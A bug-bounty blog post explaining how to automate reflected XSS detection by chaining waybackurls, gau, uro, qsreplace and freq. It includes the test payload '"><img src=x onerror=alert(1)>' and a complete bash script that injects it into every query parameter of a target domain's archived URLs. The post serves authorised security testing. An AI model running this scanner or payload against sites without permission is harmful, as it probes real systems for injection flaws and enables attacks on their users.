Automating XSS

1337.Krip
Published in System Weakness
4 min read · Jul 4, 2023


Hey folks,

How have you been?

Automation has become very popular these days, so what about automating XSS detection?

Let's get started.

Who am I?

Hi, I am Ujwal, AKA Krip, and I have just started doing bug bounties. In today's article you will learn how to automate XSS detection using a few open-source tools.

Basically, there are three main parts to automating XSS:

  1. Gathering URLs
  2. Removing similar and duplicate URLs
  3. Finding parameters in URLs and checking whether they are vulnerable to XSS

Step 1: Gathering URLs

For this step we use two well-known tools, waybackurls and gau, to gather all the URLs.

Let's suppose the target domain is example.com.

waybackurls example.com > archive_url
gau example.com >> archive_url
sort -u archive_url -o archive_url

These commands collect old and archived URLs using waybackurls and gau. After that, we remove duplicate URLs with the sort command and store the result in the archive_url file.
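Note that sort -u only removes exact duplicates: it sorts the file and keeps one copy of each identical line. A quick illustration with made-up URLs:

```shell
# Toy input: three archived URLs, one of them an exact duplicate
# (file name and URLs are made up for this demo).
printf 'https://example.com/?q=1\nhttps://example.com/?q=1\nhttps://example.com/page\n' > demo_urls

# Sort the file and drop exact-duplicate lines, rewriting it in place.
sort -u demo_urls -o demo_urls

cat demo_urls   # two unique URLs remain
```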

Step 2: Removing similar and duplicate URLs

To remove similar URLs, we use a tool named uro.

The installation process for uro is documented on its GitHub page; you can download it from there.


Let's use uro:

cat archive_url | uro | tee -a archive_url_uro

After this, we are left with worthwhile URLs for XSS testing.
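uro itself is the right tool here, but its core idea can be sketched in plain shell: treat URLs that differ only in parameter *values* as duplicates and keep one of each. This is a rough imitation under made-up example URLs; uro's real filtering is considerably smarter:

```shell
# Keep one URL per unique path + parameter-name combination,
# discarding URLs that differ only in parameter values.
printf '%s\n' \
  'https://example.com/item?id=1' \
  'https://example.com/item?id=2' \
  'https://example.com/about' |
awk -F'?' '{
  key = $1                          # the path part of the URL
  if (NF > 1) {                     # URL has a query string
    n = split($2, parts, "&")
    for (i = 1; i <= n; i++) {
      split(parts[i], kv, "=")
      key = key "&" kv[1]           # append parameter names only
    }
  }
  if (!seen[key]++) print           # print the first URL per key
}' > deduped_urls

cat deduped_urls
```

Here `?id=1` and `?id=2` collapse to a single entry, while the parameterless `/about` page is kept separately.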

Step 3: Finding parameters in URLs and checking whether they are vulnerable to XSS

To achieve this, we will use two tools: qsreplace and freq.

qsreplace: qsreplace replaces each query-parameter value with a specified payload. In our case, that is "><img src=x onerror=alert(1)>; you can substitute your own payload.
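To see what that substitution looks like, here is a rough imitation with sed (qsreplace handles URL encoding and edge cases this one-liner does not; the URL is made up):

```shell
payload='"><img src=x onerror=alert(1)>'

# Replace every query-string value (everything between "=" and the
# next "&") with the payload, mimicking what qsreplace does.
out=$(echo 'https://example.com/search?q=test&page=2' |
      sed "s/=[^&]*/=${payload}/g")

echo "$out"
```

Both the `q` and `page` values are swapped out for the injected payload.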

freq: The output of qsreplace is passed to freq. In brief, freq curls each endpoint and checks whether our payload is reflected in the response.
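The reflection check freq performs boils down to something like this minimal sketch — freq curls the live endpoint, while here a saved response body stands in for it:

```shell
# Pretend this is the HTTP response body for one injected URL.
printf '<html><body>"><img src=x onerror=alert(1)></body></html>\n' > response_demo

# If the payload comes back unencoded, the URL is likely vulnerable;
# an encoded or stripped payload would not match this fixed string.
if grep -qF '<img src=x onerror=alert(1)>' response_demo; then
  verdict="Vulnerable"
else
  verdict="Not Vulnerable"
fi

echo "$verdict"
```

This is also why the final pipeline can filter on the literal phrase "Not Vulnerable" in freq's output.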

Here is the final command

cat archive_url_uro | grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | grep -iv "Not Vulnerable" | tee -a freq_xss_findings

The given command performs a series of operations on the file "archive_url_uro." Here is a breakdown of what each part does:

  1. cat archive_url_uro: Reads the contents of the file "archive_url_uro" and writes them to the pipeline.
  2. grep "=": Keeps only the lines that contain an equals sign (=), i.e. URLs with query parameters.
  3. qsreplace '"><img src=x onerror=alert(1)>': Replaces each query-parameter value with the string "><img src=x onerror=alert(1)>. The qsreplace utility is commonly used to rewrite query-string parameters in URLs.
  4. freq: Requests each URL and checks whether the payload is reflected in the response, reporting each URL as vulnerable or not.
  5. grep -iv "Not Vulnerable": Excludes any lines that contain the case-insensitive phrase "Not Vulnerable," leaving only likely hits.
  6. tee -a freq_xss_findings: Appends the filtered output to a file named "freq_xss_findings" while also displaying it on the screen.

Automating XSS

Here is the juicy part you have all been waiting for:

#!/bin/bash

echo "[+] Running waybackurls"
waybackurls "$1" > archive_url
echo "[+] Running gau"
gau "$1" >> archive_url
sort -u archive_url -o archive_url
echo "[+] Running uro"
cat archive_url | uro | tee -a archive_url_uro
echo "[+] Starting qsreplace and freq"
cat archive_url_uro | grep "=" | qsreplace '"><img src=x onerror=alert(1)>' | freq | tee -a freq_output | grep -iv "Not Vulnerable" | tee -a freq_xss_findings
echo "[+] Script Execution Ended"

This script collects archived URLs for the given domain using waybackurls and gau, then filters out duplicate, similar, or irrelevant URLs. After that, it uses the qsreplace and freq tools to flag URLs where the payload is reflected, indicating potential Cross-Site Scripting (XSS) vulnerabilities. The findings are stored in a file called "freq_xss_findings."

Pass the domain as an argument to the script, like "./script.sh example.com".

HAPPY HUNTING, HUNTERS!!!

That's all for today. Thank you for reading.

Happy Hunting!!!
